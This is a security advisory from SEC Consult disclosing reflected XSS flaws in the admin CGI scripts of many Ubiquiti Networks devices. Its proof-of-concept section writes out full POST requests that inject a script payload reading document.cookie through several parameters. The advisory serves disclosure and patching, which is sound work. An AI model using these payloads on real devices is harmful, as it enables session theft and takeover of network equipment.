Multiple reflected cross site scripting (XSS) in Ubiquiti Networks products

SEC Consult Vulnerability Lab Security Advisory < 20170620-0 >

=======================================================================

title: Multiple Reflected Cross Site Scripting (XSS)

product: Multiple Ubiquiti Networks products, e.g.

TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16,

AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M,

AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti,

BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5,

locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22,

NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,

NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP,

Power AP N, AF24, AF24HD

vulnerable version: v1.3.3 (SW), v6.0 (XM), v3.2 (AF24)

fixed version: v1.3.4 (SW), v6.0.1 (XM), v3.2.2 (AF24)

CVE number: -

impact: Medium

homepage: www.ubnt.com

found: 2017-02-02

by: T. Weber (Office Vienna)

SEC Consult Vulnerability Lab

 

An integrated part of SEC Consult

Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow

Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 

www.sec-consult.com

 

=======================================================================

 

Vendor description:

-------------------

"Ubiquiti Networks develops high-performance networking

technology for service providers and enterprises. Our technology

platforms focus on delivering highly advanced and easily deployable

solutions that appeal to a global customer base in underserved and

underpenetrated markets."

 

Source: ir.ubnt.com

 

 

Business recommendation:

------------------------

SEC Consult recommends to install the patched firmware.

 

 

Vulnerability overview/description:

-----------------------------------

1) Reflected Cross Site Scripting (XSS) via POST request - HackerOne #203781

A reflected cross site scripting vulnerability was identified in 'ticket.cgi'

and 'login.cgi' and many other CGI scripts in the admin interface. The

parameter 'ui_language' is returned without any sanitization of the input. Other

parameters are also prone to XSS because of the same reason. An attacker can

exploit these vulnerabilities to steal cookies from the attacked user in order to

login remotely on the device. An attacker is also able to perform actions in

the context of the attacked user.

This vulnerability was found earlier by another bug bounty participant

on HackerOne. It was numbered with #158287.

 

 

Proof of concept:

-----------------

1) Reflected Cross Site Scripting (XSS) via POST request

To produce a reflected XSS, the following requests can be used for firmware

v6.0 (XM):

 

Request 1:

-------------------------------------------------------------------------------

POST /ticket.cgi HTTP/1.1

Host: $IP

Accept: */*

Accept-Language: en

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 68

 

ui_language="></script><script>alert(document.cookie)</script>

-------------------------------------------------------------------------------

Request 2:

-------------------------------------------------------------------------------

POST /login.cgi HTTP/1.1

Host: $IP

Accept: */*

Accept-Language: en

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 68

 

ui_language="></script><script>alert(document.cookie)</script>

-------------------------------------------------------------------------------

The'PHP_SELF' parameter is injectable in the same way. The 'error_msg' can be

exploited by setting the 'ui_language' to a random parameter:

Request 3:

-------------------------------------------------------------------------------

POST /login.cgi HTTP/1.1

Host: $IP

Accept: */*

Accept-Language: en

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 68

 

ui_language=1

error_msg=1"></script><script>alert(document.cookie)</script>

-------------------------------------------------------------------------------

 

Since parameter names are different in firmware v1.3.3 (SW) other names must

be used for a XSS PoC in those versions.

Request 1:

-------------------------------------------------------------------------------

POST /login.cgi HTTP/1.1

Host: $IP

Accept: */*

Accept-Language: en

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 68

 

uri=1

error_msg=1"></script><script>alert(document.cookie)</script>

-------------------------------------------------------------------------------

Request 2:

-------------------------------------------------------------------------------

POST /login.cgi HTTP/1.1

Host: $IP

Accept: */*

Accept-Language: en

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 68

 

uri=1"></script><script>alert(document.cookie)</script>

-------------------------------------------------------------------------------

Request 3:

-------------------------------------------------------------------------------

POST /login.cgi HTTP/1.1

Host: $IP

Accept: */*

Accept-Language: en

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 68

 

PHP_SELF=1"></script><script>alert(document.cookie)</script>

-------------------------------------------------------------------------------

 

The latter requests used 'login.cgi' and 'ticket.cgi' but many more scripts in

the administrative panel are prone to this type of vulnerability. The PoC for

the AirFiber series looks like request 3 from above.

 

 

Vulnerable / tested versions:

-----------------------------

(Rocket) M5 - v6.0 (XM)

TS-8-PRO - v1.3.3 (SW)

(AirFiber) AF24 - v3.2 (AF24)

 

Based on information embedded in the firmware of other Ubiquiti products

gathered from our IoT Inspector tool we believe the following devices are affected

as well:

Ubiquiti Networks AF-2X (Version: AF2X v3.2 )

Ubiquiti Networks AF-3X (Version: AF3X v3.2)

Ubiquiti Networks AF5 (Version: AF5 v3.2)

Ubiquiti Networks AF5U (Version: AF5 v3.2)

Ubiquiti Networks AF-5X (Version: AF5X v3.2.1)

Ubiquiti Networks LBE-5AC-16-120 (Version: WA v7.2.4)

Ubiquiti Networks LBE-5AC-23 (Version: WA v7.2.4)

Ubiquiti Networks LBE-M5-23 (Version: XW v6.0)

Ubiquiti Networks NBE-5AC-16 (Version: WA v7.2.4)

Ubiquiti Networks NBE-5AC-19 (Version: XC v7.2.4)

Ubiquiti Networks NBE-M2-13 (Version: XW v6.0)

Ubiquiti Networks NBE-M5-16 (Version: XW v6.0)

Ubiquiti Networks NBE-M5-19 (Version: XW v6.0)

Ubiquiti Networks PBE-5AC-300 (Version: XC v7.2.4)

Ubiquiti Networks PBE-5AC-300-ISO (Version: XC v7.2.4)

Ubiquiti Networks PBE-5AC-400 (Version: XC v7.2.4)

Ubiquiti Networks PBE-5AC-400-ISO (Version: XC v7.2.4)

Ubiquiti Networks PBE-5AC-500 (Version: XC v7.2.4)

Ubiquiti Networks PBE-5AC-500-ISO (Version: XC v7.2.4)

Ubiquiti Networks PBE-5AC-620 (Version: XC v7.2.4)

Ubiquiti Networks PBE-M2-400 (Version: XW v6.0)

Ubiquiti Networks PBE-M5-300 (Version: XW v6.0)

Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0)

Ubiquiti Networks PBE-M5-400 (Version: XW v6.0)

Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0)

Ubiquiti Networks PBE-M5-620 (Version: XW v6.0)

Ubiquiti Networks R5AC-Lite (Version: XC v7.2.4)

Ubiquiti Networks R5AC-PRISM (Version: XC v7.2.4)

Ubiquiti Networks R5AC-PTMP (Version: XC v7.2.4)

Ubiquiti Networks R5AC-PTP (Version: XC v7.2.4)

Ubiquiti Networks RM2-Ti (Version: XW v6.0)

Ubiquiti Networks RM5-Ti (Version: XW v6.0)

 

 

Vendor contact timeline:

------------------------

2017-02-06: Contacting vendor via HackerOne

2017-02-15: Vendor marked POST XSS as duplicate to: #158287

2017-02-21: Asking when a patch will be available; No answer.

2017-03-17: Asking for a status update. Vendor responds, that

the vulnerability is resolved in the newest firmware

- v1.3.4 (SW) / v6.0.1 (XM) / v3.2.2 (AF24).

2017-03-20: Informing the vendor that the release date has been

set to 2017-03-22.

2017-03-20: Vendor ask for more time because the vulnerability is

not fixed in all devices. Shifted release to 2017-06-19.

2017-03-21: Asking for a estimated time-frame. Vendor needs 1-3 weeks

in order to provide a fix. Service release for AirOS v8.0.2

(AC) and AirOS v6.0.2 (M) are planned.

2017-03-22: Fixes confirmed

2017-05-15: Contacted vendor via e-mail and set the publication date

to 2017-06-20.

2017-06-20: Public release of security advisory

 

 

Solution:

---------

Upgrade to firmware version v1.3.4 (SW), v6.0.1 (XM), v3.2.2 (AF24) or

later.

 

 

Workaround:

-----------

No workaround

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

SEC Consult Vulnerability Lab

 

SEC Consult

Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow

Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 

About SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It

ensures the continued knowledge gain of SEC Consult in the field of network

and application security to stay ahead of the attacker. The SEC Consult

Vulnerability Lab supports high-quality penetration testing and the evaluation

of new offensive and defensive technologies for our customers. Hence our

customers obtain the most current information about vulnerabilities and valid

recommendation about the risk profile of new technologies.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?

Send us your application www.sec-consult.com/career/

 

Interested in improving your cyber security with the experts of SEC Consult?

Contact our local offices www.sec-consult.com/contact/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

EOF T. Weber / @2017